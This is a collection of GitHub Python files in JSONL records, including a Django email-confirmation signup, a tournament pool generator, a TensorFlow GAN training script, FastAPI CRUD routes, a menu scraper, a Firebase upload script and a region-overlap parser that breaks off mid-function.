+{"seq_id":"12446040898","text":"from __future__ import annotations\nfrom django.contrib.auth import get_user_model\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.core.mail import send_mail\nimport uuid\nimport time\nimport random\nfrom ..dto.create_user import CreateUserDTO\nfrom ..exceptions import (\n ConfirmationCodeExpired,\n ConfirmationCodeDoesNotExist\n)\nfrom ...models import EmailConfirmationCode\n\n\ndef add_user(data: CreateUserDTO) -> None:\n user_model = get_user_model()\n created_user = user_model.objects.create_user(username=data.username,\n email=data.email,\n password=data.password,\n is_active=False)\n\n confirmation_code = str(uuid.uuid4())\n code_expiration_time = int(time.time()) + settings.CONFIRMATION_CODE_LIFETIME\n confirmation_url = settings.SERVER_HOST + reverse('confirm') + f'?code={confirmation_code}'\n EmailConfirmationCode.objects.create(\n user=created_user,\n expiration=code_expiration_time,\n code=confirmation_code\n )\n send_mail(\n subject='Confirm your email',\n message=f\"Please confirm your email by clicking the link below:\\n\\n{confirmation_url}\",\n from_email=settings.EMAIL_FROM,\n recipient_list=[data.email]\n )\n\n\ndef confirmation_user(confirmation_code: str) -> None:\n try:\n data = EmailConfirmationCode.objects.get(code=confirmation_code)\n\n except EmailConfirmationCode.DoesNotExist:\n raise ConfirmationCodeDoesNotExist('Confirmation Code Does Not Exist')\n\n if time.time() > data.expiration:\n raise ConfirmationCodeExpired\n\n user = data.user\n user.is_active = True\n user.save()\n\n data.delete()\n","repo_name":"Anastasiia323/blog_app","sub_path":"sourse/blogging_app/core/busines_logic/servises/create_user.py","file_name":"create_user.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38134018540","text":"import random\nimport math\n\n#Tournament Pools\nplayernum = int(input(\"How many players are competing: \"))\npoolnum = int(input(\"How many pools: \"))\nroundnum = int(input(\"How many rounds: \"))\nfinalnum = int(input(\"How many people in finals: \"))\nsplitnum = math.ceil(playernum / poolnum)\n\ndef createrecords(playernum):\n matchhistory = {}\n for player in range(1, playernum + 1):\n matchhistory[player] = [0, 0, 0] #games, wins, points\n return matchhistory\n\ndef splitlist(poolnum, splitnum, players, pools):\n for num in range(poolnum):\n print(players[splitnum * num: splitnum * (num+1)])\n pools.append(players[splitnum * num: splitnum * (num+1)])\n\ndef poollist(pools, splitnum):\n totalmatch = 0\n for group in pools:\n poolmatch = []\n print()\n print(\"Pool \" + str(pools.index(group) + 1) + \":\")\n for num in range(0, len(group)):\n for x in range(num + 1, len(group)):\n poolmatch.append([group[x], group[num]])\n totalmatch += 1\n poolmatch = random.sample(poolmatch, len(poolmatch))\n for num in range(len(poolmatch)):\n print(\"Match \" + str(num + 1) + \": \" + str(poolmatch[num][0]) + \" vs \" + str(poolmatch[num][1]))\n if len(poolmatch) == 0:\n print(\"No matches for this pool!\")\n return totalmatch\n \ndef matchresult(matchhistory):\n #draws\n confirm = False\n while not confirm:\n print(\"Please enter match stats!\")\n draws = input(\"Was the match a draw? Type Y or N.\")\n if draws is \"Y\" or draws is \"y\":\n player1 = int(input(\"Player 1: \"))\n player2 = int(input(\"Player 2: \"))\n player1points = float(input(\"Player 1's Points: \"))\n player2points = float(input(\"Player 2's Points: \"))\n else:\n winner = int(input(\"Winner: \"))\n loser = int(input(\"Loser: \"))\n winnerpoints = float(input(\"Winner's Points: \"))\n loserpoints = float(input(\"Loser's Points: \"))\n query = input(\"Confirm? 
Type Y or N.\")\n if query is \"Y\":\n confirm = True\n else:\n confirm = False\n print(\"Match recorded!\")\n if draws is \"Y\" or draws is \"y\":\n matchhistory[player1][0] += 1\n matchhistory[player2][0] += 1\n matchhistory[player1][1] += .5\n matchhistory[player2][1] += .5\n matchhistory[player1][2] += player1points\n matchhistory[player2][2] += player2points\n else:\n matchhistory[winner][0] += 1\n matchhistory[winner][1] += 1\n matchhistory[loser][0] += 1\n matchhistory[winner][2] += winnerpoints\n matchhistory[loser][2] += loserpoints\n\ndef decidefinals(finalnum, matchhistory, playernum):\n criteria = {}\n finals = []\n for player in range(1, playernum + 1):\n criteria[player] = matchhistory[1] / matchhistory[0]\n gameratio = set(criteria.values())\n while finals < finalnum:\n for item in criteria:\n if criteria[item] == max(gameratio):\n del(criteria[item])\n finals.append(item)\n gameratio.remove(max(gameratio))\n \n\ndef generatematch(playernum, poolnum, roundnum, splitnum):\n matchhistory = createrecords(playernum)\n print(matchhistory)\n for num in range(roundnum):\n pools = []\n players = random.sample(range(1, playernum + 1), playernum)\n splitlist(poolnum, splitnum, players, pools)\n print()\n print(\"Round \" + str(num + 1) + \":\")\n print(pools)\n for num in range(poollist(pools, splitnum)):\n matchresult(matchhistory)\n decidefinals(finalnum, matchhistory, playernum)\n\ngeneratematch(playernum, poolnum, roundnum, splitnum)\n\n\n","repo_name":"danielkim0-highschool/Assorted-Python-Projects","sub_path":"TournamentPools.py","file_name":"TournamentPools.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25097006175","text":"#!/usr/bin/env python\n\"\"\"\n####################################################################################\n # -*- coding: utf-8 -*-\n # Author : Thomas Neuer (tneuer)\n # Creation Date : 2019-11-18 14:45:06\n # Description :\n####################################################################################\n\"\"\"\nimport os\nif \"lhcb_data2\" in os.getcwd():\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nimport sys\nsys.path.insert(1, \"Preprocessing\")\nsys.path.insert(1, \"TFModels\")\nsys.path.insert(1, \"TFModels/building_blocks\")\nsys.path.insert(1, \"TFModels/GAN\")\nsys.path.insert(1, \"TFModels/CGAN\")\nsys.path.insert(1, \"TFModels/CGAN/OLD\")\nsys.path.insert(1, \"Utilities\")\nimport json\nimport grid_search\n\nimport numpy as np\nimport tensorflow as tf\nif \"lhcb_data2\" in os.getcwd():\n gpu_frac = 0.3\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_frac)\n print(\"1 GPU limited to {}% memory.\".format(np.round(gpu_frac*100)))\nelse:\n gpu_options = None\n\nfrom TFModels.PGAN import create_algorithm\nimport Preprocessing.initialization as init\nfrom building_blocks.layers import logged_dense, conv2d_logged, conv2d_transpose_logged\nfrom building_blocks.layers import reshape_layer, sample_vector_layer, replicate_vector_layer\nfrom building_blocks.layers import logged_dense, conv2d_logged, conv2d_transpose_logged, residual_block, unet, unet_original, inception_block\nfrom functionsOnImages import padding_zeros\nfrom generativeModels import GenerativeModel\n\n\n############################################################################################################\n# Parameter definiton\n############################################################################################################\nparam_dict = {\n \"z_dim\": [32, 64],\n \"optimizer\": [tf.train.RMSPropOptimizer],\n \"algorithm\": [\"CGAN\"],\n \"dataset\": [\"PiplusLowerP\"],\n \"gen_steps\": [1],\n \"adv_steps\": [5],\n # \"architecture\": [\"more_unbalanced\"],\n \"architecture\": [\"unbalanced2\", \"unbalanced\"],\n \"is_patchgan\": [False],\n \"batch_size\": [8],\n \"loss\": [\"cross-entropy\", \"KL\", \"wasserstein\"],\n \"cc\": [False],\n \"lr\": [0.001],\n \"feature_matching\": [False, True],\n \"label_smoothing\": [0.95]\n}\nsampled_params = grid_search.get_parameter_grid(param_dict=param_dict, n=30, allow_repetition=True)\n\nfor params in sampled_params:\n\n activation = tf.nn.leaky_relu\n algorithm = str(params[\"algorithm\"])\n append_y = False\n architecture = str(params[\"architecture\"])\n architecture_path = \"../Architectures/CGAN/{}.json\".format(architecture)\n is_patchgan = bool(params[\"is_patchgan\"])\n loss = str(params[\"loss\"])\n is_wasserstein = loss == \"wasserstein\"\n is_cycle_consistent = bool(params[\"cc\"])\n label_smoothing = float(params[\"label_smoothing\"])\n\n batch_size = int(params[\"batch_size\"])\n dataset = str(params[\"dataset\"])\n epochs = 120\n feature_matching = bool(params[\"feature_matching\"])\n\n keep_cols = [\"x_projections\", \"y_projections\", \"real_ET\"]\n nr_test = 100\n nr_train = 50000\n\n optimizer = params[\"optimizer\"]\n learning_rate = float(params[\"lr\"])\n\n if \"lhcb_data2\" in os.getcwd():\n path_loading = \"../Data/{}/LargeSample\".format(dataset)\n path_results = \"../Results/{}\".format(dataset)\n else:\n path_loading = \"../Data/{}/Debug\".format(dataset)\n path_results = \"../Results/Test/{}\".format(dataset)\n\n reshape_z = \"none\"\n steps_adv = 
int(params[\"adv_steps\"])\n steps_gen = int(params[\"gen_steps\"])\n steps_log = 3\n\n padding = {\"top\":2, \"bottom\":2, \"left\":0, \"right\":0}\n x_dim = image_shape = (52+padding[\"top\"]+padding[\"bottom\"], 64+padding[\"left\"]+padding[\"right\"], 1)\n y_dim = len(keep_cols)\n z_dim = int(params[\"z_dim\"])\n\n\n ############################################################################################################\n # Network initialization\n ############################################################################################################\n\n\n if reshape_z == \"none\":\n architectures = GenerativeModel.load_from_json(architecture_path)\n architecture_gen = architectures[\"Generator\"]\n architecture_adv = architectures[\"Critic\"]\n if is_patchgan:\n architecture_adv.append([conv2d_logged, {\"filters\": 64, \"kernel_size\": 4, \"strides\": 2, \"activation\": tf.nn.leaky_relu}])\n if is_wasserstein:\n architecture_adv.append([conv2d_logged, {\"filters\": 1, \"kernel_size\": 4, \"strides\": 1, \"activation\": tf.identity}])\n else:\n architecture_adv.append([conv2d_logged, {\"filters\": 1, \"kernel_size\": 4, \"strides\": 1, \"activation\": tf.nn.sigmoid}])\n else:\n architecture_adv[-1][1][\"activation\"] = tf.nn.leaky_relu\n\n elif reshape_z == \"replicate\":\n initial_size = [7, 8]\n architecture_gen = [\n [replicate_vector_layer, {\"size\": initial_size}],\n [conv2d_transpose_logged, {\"filters\": 512, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 256, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 1, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation_last_layer}]\n ]\n elif reshape_z == \"sample\":\n initial_size = [7, 8]\n architecture_gen = [\n [sample_vector_layer, {\"size\": initial_size, \"y_dim\": len(keep_cols),\n \"rfunc\": sampling_distribution[0], \"rparams\": sampling_distribution[1]}],\n [conv2d_transpose_logged, {\"filters\": 512, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 256, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 1, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation_last_layer}]\n ]\n else:\n raise NotImplementedError(\"Wrong reshape_z method.\")\n\n if is_cycle_consistent:\n architecture_aux = [\n [tf.layers.conv2d, {\"filters\": 128, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [tf.layers.conv2d, {\"filters\": 256, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [tf.layers.conv2d, {\"filters\": 128, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [tf.layers.flatten, {}],\n [tf.layers.dense, {\"units\": z_dim+y_dim, \"activation\": tf.identity}],\n ]\n else:\n architecture_aux = None\n\n ############################################################################################################\n # Data loading\n ############################################################################################################\n if not os.path.exists(path_results):\n os.mkdir(path_results)\n\n path_saving = init.initialize_folder(algorithm=algorithm, base_folder=path_results)\n\n data, scaler = init.load_processed_data(path_loading, return_scaler=True)\n train_calo = data[\"train\"][\"Calo\"][:nr_train]\n train_tracker = data[\"train\"][\"Tracker\"][:nr_train]\n test_calo = data[\"test\"][\"Calo\"]\n test_tracker 
= data[\"test\"][\"Tracker\"]\n\n train_calo = padding_zeros(train_calo, **padding).reshape([-1, *image_shape])\n test_calo = padding_zeros(test_calo, **padding).reshape([-1, *image_shape])\n test_calo = test_calo[:nr_test]\n logging_calo = test_calo[:15]\n\n ##### Rescale and check that identical\n def invert_standardize_data(data, scaler, exclude=None):\n import pandas as pd\n standardized_data = data.drop(exclude, axis=1, inplace=False)\n colnames = standardized_data.columns.values\n standardized_data = pd.DataFrame(data=scaler.inverse_transform(standardized_data), columns=colnames, index=data.index)\n data = pd.concat([standardized_data, data[exclude]], axis=1, sort=False)\n return data\n\n train_tracker[\"real_ET\"] = invert_standardize_data(data=train_tracker, scaler=scaler[\"Tracker\"], exclude=[\"theta\", \"phi\", \"region\"])[\"real_ET\"]\n train_tracker[\"real_ET\"] /= scaler[\"Calo\"]\n\n test_tracker[\"real_ET\"] = invert_standardize_data(data=test_tracker, scaler=scaler[\"Tracker\"], exclude=[\"theta\", \"phi\", \"region\"])[\"real_ET\"]\n test_tracker[\"real_ET\"] /= scaler[\"Calo\"]\n\n assert np.max(train_calo) == 1, \"Train calo maximum not one. Given: {}.\".format(np.max(train_calo))\n # assert np.allclose(np.mean(train_tracker[keep_cols[:-1]], axis=0), 0, atol=1e-5), \"Train not centralized: {}.\".format(\n # np.mean(train_tracker[keep_cols], axis=0)\n # )\n # assert np.allclose(np.mean(test_tracker, axis=0), 0, atol=1e-1), \"Test not centralized: {}.\".format(np.mean(test_tracker, axis=0))\n # assert np.allclose(np.std(train_tracker[keep_cols[:-1]], axis=0), 1, atol=1e-10), \"Train not standardized: {}.\".format(\n # np.std(train_tracker[keep_cols], axis=0)\n # )\n assert image_shape == train_calo.shape[1:], \"Wrong image shape vs train shape: {} vs {}.\".format(image_shape, train_calo.shape[1:])\n train_tracker = train_tracker[keep_cols].values\n test_tracker = test_tracker[keep_cols].values\n test_tracker = test_tracker[:nr_test]\n logging_tracker = test_tracker[:15]\n\n nr_train = train_calo.shape[0]\n\n ############################################################################################################\n # Preparation\n ############################################################################################################\n def prepare_algorithm(network, optimizer, learning_rate):\n network.compile(logged_labels=logging_tracker, logged_images=logging_calo, optimizer=optimizer, learning_rate=learning_rate,\n loss=loss, feature_matching=feature_matching, label_smoothing=label_smoothing)\n network.set_attributes(keep_cols)\n post_message = \"\"\"\\nCalo shape: {}\\nTracker shape: {}\n \\nUsed attributes: {}\n \\nAppend attributes at every layer: {}\"\"\".format(train_calo.shape, train_tracker.shape, keep_cols, append_y)\n network.log_architecture(post_message=post_message)\n\n nr_params = network.get_number_params()\n nr_gen_params = network._nets[0].get_number_params()\n nr_disc_params = network._nets[1].get_number_params()\n sampler = network.get_sampling_distribution()\n config_data.update({\"nr_params\": nr_params, \"sampler\": sampler, \"generator_out\": network._generator._output_layer.name, \"optimizer\": optimizer.__name__, \"nr_gen_params\": nr_gen_params, \"nr_disc_params\": nr_disc_params})\n\n config_data.pop(\"architectures\")\n with open(path_saving+\"/config.json\", \"w\") as f:\n json.dump(config_data, f, indent=4)\n\n config_data = init.create_config_file(globals())\n\n 
############################################################################################################\n # Model Training\n ############################################################################################################\n\n try:\n network = create_algorithm(algorithm, x_dim=x_dim, y_dim=y_dim, z_dim=z_dim,\n gen_architecture=architecture_gen, adv_architecture=architecture_adv,\n aux_architecture=architecture_aux,\n folder=path_saving, append_y_at_every_layer=append_y,\n is_patchgan=is_patchgan, is_wasserstein=is_wasserstein)\n\n prepare_algorithm(network, optimizer, learning_rate)\n\n network.show_architecture()\n network.train(x_train=train_calo, y_train=train_tracker, x_test=test_calo, y_test=test_tracker,\n epochs=epochs, batch_size=batch_size, steps=steps_gen, log_step=steps_log, gpu_options=gpu_options,\n batch_log_step=None)\n with open(path_saving+\"/EXIT_FLAG0.txt\", \"w\") as f:\n f.write(\"EXIT STATUS: 0. No errors or warnings.\")\n tf.reset_default_graph()\n except GeneratorExit as e:\n with open(path_saving+\"/EXIT_FLAG1.txt\", \"w\") as f:\n f.write(\"EXIT STATUS: 1. {}.\".format(e))\n tf.reset_default_graph()\n","repo_name":"tneuer/Masterarbeit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73475143687","text":"import uuid\nfrom pydantic import BaseModel\nfrom fastapi import Depends\nfrom app.ctx import AppCtx\nfrom app.utils import fastapi as fastapi_utils\nfrom app.utils import auth as auth_utils\nfrom sqlalchemy.sql import expression as sa_exp\nfrom app.models import orm as m\n\nrouter = fastapi_utils.CustomAPIRouter(\n prefix=\"/performance/log\", tags=[\"performance_log\"]\n)\n\n\nclass PerformanceLogGetAndListResponse(BaseModel):\n id: uuid.UUID\n count: int\n weight: int\n\n\n@router.api_wrapper(\"GET\", \"/:id\", error_codes=[])\nasync def performance_log_get(\n id: uuid.UUID,\n) -> PerformanceLogGetAndListResponse:\n performance_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.PerformanceLog).where(m.PerformanceLog.id == id)\n )\n ).scalar_one_or_none()\n\n if performance_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n return PerformanceLogGetAndListResponse(\n id=performance_log.id,\n count=performance_log.count,\n weight=performance_log.weight,\n )\n\n\n@router.api_wrapper(\"GET\", \"\", error_codes=[])\nasync def performance_log_list() -> list[PerformanceLogGetAndListResponse]:\n performance_log_query = sa_exp.select(m.PerformanceLog)\n\n performance_log_query = performance_log_query.order_by(\n m.PerformanceLog.created.asc()\n )\n\n performance_log_list = (\n (await AppCtx.current.db.session.execute(performance_log_query)).scalars().all()\n )\n\n return [\n PerformanceLogGetAndListResponse(\n id=performance_log.id,\n count=performance_log.count,\n weight=performance_log.weight,\n )\n for performance_log in performance_log_list\n ]\n\n\nclass PerformanceLogPostRequest(BaseModel):\n count: int\n weight: int\n exercise_category_id: uuid.UUID\n daily_log_id: uuid.UUID\n\n\nclass PerformanceLogPostResponse(BaseModel):\n id: uuid.UUID\n\n\n@router.api_wrapper(\n \"POST\",\n \"\",\n error_codes=[],\n)\nasync def performance_log_post(\n q: PerformanceLogPostRequest,\n) -> PerformanceLogPostResponse:\n exercise_category = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.ExerciseCategory).where(\n m.ExerciseCategory.id == q.exercise_category_id\n )\n )\n ).scalar_one_or_none()\n\n if exercise_category is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n daily_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.DailyLog).where(m.DailyLog.id == q.daily_log_id)\n )\n ).scalar_one_or_none()\n\n if daily_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n performance_log = m.PerformanceLog(\n count=q.count,\n weight=q.weight,\n exercise_category=exercise_category,\n daily_log=daily_log,\n )\n\n AppCtx.current.db.session.add(performance_log)\n\n await AppCtx.current.db.session.commit()\n\n return PerformanceLogPostResponse(id=performance_log.id)\n\n\nclass PerformanceLogPatchRequest(BaseModel):\n count: int | None\n weight: int | None\n\n\nclass PerformanceLogPatchResponse(BaseModel):\n id: uuid.UUID\n count: int\n weight: int\n\n\n@router.api_wrapper(\n \"PATCH\",\n \"/:id\",\n error_codes=[],\n)\nasync def performance_log_patch(\n id: uuid.UUID,\n q: PerformanceLogPatchRequest,\n) -> PerformanceLogPatchResponse:\n performance_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.PerformanceLog).where(m.PerformanceLog.id == id)\n )\n ).scalar_one_or_none()\n\n if performance_log is None:\n raise 
fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n for key, value in q.__dict__.items():\n if value is not None:\n setattr(performance_log, key, value)\n\n AppCtx.current.db.session.add(performance_log)\n\n await AppCtx.current.db.session.commit()\n\n return PerformanceLogPatchResponse(\n id=performance_log.id,\n count=performance_log.count,\n weight=performance_log.weight,\n )\n\n\n@router.api_wrapper(\n \"DELETE\",\n \"/:id\",\n error_codes=[],\n)\nasync def performance_log_delete(\n id: uuid.UUID,\n) -> fastapi_utils.DefaultResponse:\n performance_log = (\n await AppCtx.current.db.session.execute(\n sa_exp.select(m.PerformanceLog).where(m.PerformanceLog.id == id)\n )\n ).scalar_one_or_none()\n\n if performance_log is None:\n raise fastapi_utils.LogicError(fastapi_utils.LogicErrorCodeEnum.ModelNotFound)\n\n await AppCtx.current.db.session.delete(performance_log)\n\n await AppCtx.current.db.session.commit()\n\n return fastapi_utils.DefaultResponse()\n","repo_name":"Mactto/weight-daily-log-api","sub_path":"app/apis/performance_log.py","file_name":"performance_log.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41092897494","text":"from lxml.html import parse\nfrom pprint import pprint\nimport pickle\nimport re\n\n\"\"\"\nFetch this week's soup from Leon's website\n\nRun: daily, early morning\n\"\"\"\n\noutfile = '/tmp/leon.pkl'\nsoupurl = 'http://leonrestaurants.co.uk/menu/all-day/'\n\ndef fix_text(astr) :\n\tastr = astr.replace(' Soup', '').strip()\n\treturn astr\n\n\ndef is_soup(item):\n\tif (\"Soup\" in item):\n\t\treturn True\n\treturn False\n\n\ndoc = parse(soupurl)\nelements = doc.xpath('//div[@class=\"more-info-wrapper\"]/h1[@class=\"menu-item-title\"]')\n\nroughlist = [elem.text for elem in elements if (is_soup(elem.text))]\nsouplist = map(fix_text, roughlist)\n\n#pprint(souplist)\n\noutput = open(outfile, 'wb')\npickle.dump(souplist, output, -1)\noutput.close()\n","repo_name":"simonharris/whatsoupisittoday.com","sub_path":"_scripts/fetch_leon.py","file_name":"fetch_leon.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"22860830503","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ride', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='ride',\n name='serviced_by',\n field=models.ForeignKey(related_name='rides', blank=True, to='core.Driver', null=True),\n ),\n ]\n","repo_name":"cmpe-295/project-backend","sub_path":"safe_ride/ride/migrations/0002_auto_20161018_0043.py","file_name":"0002_auto_20161018_0043.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8749001831","text":"# Import for data-typing\nfrom google.auth.transport.requests import AuthorizedSession\nimport google.auth.transport.requests as requests\nfrom http import client\n\n# Built-in libraries\nimport json\nimport threading\nimport time\n\n# Global variables\nerror_files = []\n# ----------------------------------------------------------------------------------\n\n\nclass RequestThread(\n threading.Thread\n):\n def __init__(\n self,\n auth_session: AuthorizedSession,\n file_dir: str,\n index_json_dir: str,\n full_url: str,\n file_name: str,\n index_lock: threading.Lock,\n print_lock: threading.Lock,\n error_lock: threading.Lock,\n ) -> None:\n \"\"\"\n Thread to handle POST requests\n\n Args:\n auth_session (AuthorizedSession): Authenticated request object\n file_dir (str): Directory of JSONs\n index_json_dir (str): Directory of index.json\n full_db_url (str): URL of database\n file_name (str): Name of file to add to database\n index_lock (threading.Lock): Lock to prevent race conditions while accessing/editing index.json\n print_lock (threading.Lock): Lock to prevent race conditions while printing\n error_lock (threading.Lock): Lock to prevent race conditions while adding to error list\n \"\"\"\n threading.Thread.__init__(self)\n self.session = auth_session\n self.file_dir = file_dir\n self.index_json_dir = index_json_dir\n self.full_url = full_url\n self.file_name = file_name\n self.index_lock = index_lock\n self.print_lock = print_lock\n self.error_lock = error_lock\n self.connection_attempts = 0\n\n def run(\n self\n ) -> None:\n \"\"\"\n Function that overrides threading.Thread's default behavior.\n \"\"\"\n global error_files\n\n # Ensures that the program will attempt a few times to connect to the database\n while self.connection_attempts < 3:\n try:\n # Checks to see if the file has already been added to the index\n with self.index_lock:\n with open(self.index_json_dir, \"r\", encoding=\"utf-8\") as f:\n index_json = json.load(f)\n\n # If the file is already in the index\n if self.file_name in index_json.keys():\n # Print lock\n with self.print_lock:\n print(f\"{self.file_name} already exists! 
\")\n\n # If the file is not already in the index\n else:\n # Builds file path\n full_file_dir = f\"{self.file_dir}/{self.file_name}\"\n\n # Opens JSON file (thread safe because threads are accessing different files)\n with open(full_file_dir, \"r\", encoding=\"utf-8\") as f:\n edit_json_file = json.load(f)\n\n # Renames keys since Firebase does not like $'s in keys\n schema = edit_json_file['$schema']\n json_id = edit_json_file['$id']\n\n del edit_json_file['$schema']\n del edit_json_file['$id']\n\n edit_json_file['schema'] = schema\n edit_json_file['id'] = json_id\n\n json_file = json.dumps(edit_json_file, indent=4, sort_keys=True)\n\n # Sends JSON to database\n response = self.session.post(self.full_url, data=json_file)\n\n # If the database says it was a good request\n if response.status_code == 200:\n\n # Puts response into a JSON\n response_detail = response.json()\n\n # Index lock\n with self.index_lock:\n # Pulls up latest version of index\n with open(self.index_json_dir, \"r\", encoding=\"utf-8\") as f:\n index_json = json.load(f)\n\n # We add the added json name to the index file with the unique ID assigned by the db\n index_json[str(self.file_name)] = response_detail[\"name\"]\n\n # Overwrites index JSON (with formatting)\n with open(self.index_json_dir, \"w\") as f:\n json.dump(index_json, f, indent=4, sort_keys=True)\n\n # Print lock\n with self.print_lock:\n print(f\"{self.file_name} successfully added!\")\n\n # If the databases says it was not a good request\n else:\n # Error lock\n with self.error_lock:\n error_files.append(\n f\"{self.file_name} Error: {response.status_code}\"\n )\n\n # If there is a connection error\n except client.RemoteDisconnected:\n print(f\"Connection failed with {self.file_name}\")\n self.connection_attempts += 1\n\n if self.connection_attempts >= 3:\n error_files.append(f\"{self.file_name} Error: ConnectionError\")\n break\n\n else:\n time.sleep(3)\n pass\n\n else:\n break\n\n\ndef main(\n auth_session: AuthorizedSession,\n file_dir: str,\n index_json_dir: str,\n db_folder_url: str,\n file_list: list[str],\n) -> None:\n \"\"\"\n Main function to add JSONs to the database\n\n Args:\n auth_session (AuthorizedSession): Authenticated request object\n file_dir (str): Directory of JSONs\n index_json_dir (str): Directory of index.json\n db_folder_url (str): URL of target database folder\n file_list (list[str]): List of file names within target directory\n \"\"\"\n global error_files\n\n # Creates locks\n index_lock = threading.Lock()\n print_lock = threading.Lock()\n error_lock = threading.Lock()\n\n # Creates threads\n threads = []\n for file in file_list:\n threads.append(\n RequestThread(\n auth_session,\n file_dir,\n index_json_dir,\n db_folder_url,\n file,\n index_lock,\n print_lock,\n error_lock,\n )\n )\n\n # Starts threads\n for thread in threads:\n thread.start()\n\n # Joins threads\n for thread in threads:\n thread.join()\n\n # Error notifications\n if len(error_files) > 0:\n print(\"The following files had errors:\\n\")\n\n for file in error_files:\n print(file)\n\n error_files = []\n\n print()\n\n\n# If the program is run directly when it is not supposed to\nif __name__ == \"__main__\":\n print(\n \"This code is not meant to be executed directly, please execute main.py instead.\"\n )\n","repo_name":"SethHartman13/Magic-Item-Database-v.2","sub_path":"magic_item_post.py","file_name":"magic_item_post.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25043136042","text":"class Region:\n \"\"\"Class to store region info\"\"\"\n\n def __init__(self, y_axis, start, stop):\n\n self.y_axis = y_axis\n self.start = start\n self.stop = stop\n\n def to_string(self):\n \"\"\"Return region info as string\"\"\"\n\n line = list(map(str, [self.y_axis, self.start, self.stop]))\n return ('\\t'.join(line) + '\\n')\n\n def to_list(self):\n \"\"\"Return region info as list\"\"\"\n\n return [self.y_axis, self.start, self.stop]\n\n\nclass Segment:\n \"\"\"Class to store segment info\"\"\"\n\n def __init__(self, count, start, stop):\n\n self.count = count\n self.start = start\n self.stop = stop\n\n def to_string(self):\n \"\"\"Return segment info as string\"\"\"\n \n line = list(map(str, [self.count, self.start, self.stop]))\n return ('\\t'.join(line) + '\\n')\n\n def to_list(self):\n \"\"\"Return segment info as string\"\"\"\n\n return [self.count, self.start, self.stop]\n\n\nclass Parser:\n \"\"\"Class to get and parse data from source file\"\"\"\n\n def __init__(self, data_path):\n\n self.data_path = data_path\n # Store regions in a list of Region objects\n self.regions = []\n # Store segments in a list of Segment objects\n self.segments = []\n\n self.get_data()\n self.non_overlapping_segments()\n\n def get_data(self):\n \"\"\"Read source file and create regions and segments datasets\"\"\"\n\n regions_file = open(self.data_path, 'r')\n regions_lines = regions_file.readlines()\n regions_file.close()\n\n for line in regions_lines:\n split_line = line.rstrip().split('\\t')\n start = int(split_line[0])\n stop = int(split_line[1])\n region = Region(0, start, stop)\n self.regions.append(region)\n self.segments = self.segments + [start, stop]\n\n def non_overlapping_segments(self):\n \"\"\"Parse segments dataset as a list of non-overlapping Segment intervals\"\"\"\n\n # Remove duplicated segments to avoid duplicated non-overlapping intervals\n self.segments = list(set(self.segments))\n # Order the segments to set correctly non-overlapping interval\n self.segments.sort()\n # Set non-overlapping intervals as region-region start-stop pairs Segment objects\n # If segment B has start position X, then segment A has end position X-1. 
The segments do not overlap.\n self.segments = [Segment(0, self.segments[i], self.segments[i + 1] - 1) for i in range(len(self.segments)-1)]\n \n\nclass Process:\n \"\"\"Class to process part1 and part2 tasks and export results\"\"\"\n\n def __init__(self, regions, segments):\n\n self.regions = regions\n self.segments = segments\n\n def to_list(self, dataset):\n \"\"\"Return dataset(Region/Segment) as a list of list info\"\"\"\n\n return [data.to_list() for data in dataset]\n\n def export_data(self, dataset, path):\n \"\"\"Export results to output file\"\"\"\n\n output = open(path, 'w')\n for data in dataset:\n output.write(data.to_string())\n output.close()\n\n def overlap(self, region1, region2):\n \"\"\"Check if two region/segment overlaps\"\"\"\n\n # Overlap border cases consideration:\n # If the overlap is based on 1 position been a START ovelap over a STOP, is not considered overlap\n return ((region1.start <= region2.start < region1.stop) or \n (region1.start < region2.stop <= region1.stop) or \n ((region1.start >= region2.start) and (region1.stop <= region2.stop)))\n\n def part1_task(self):\n \"\"\"Part1 task calculation\"\"\"\n\n for region in self.regions:\n # Store the Y-axis level used by other regions on the 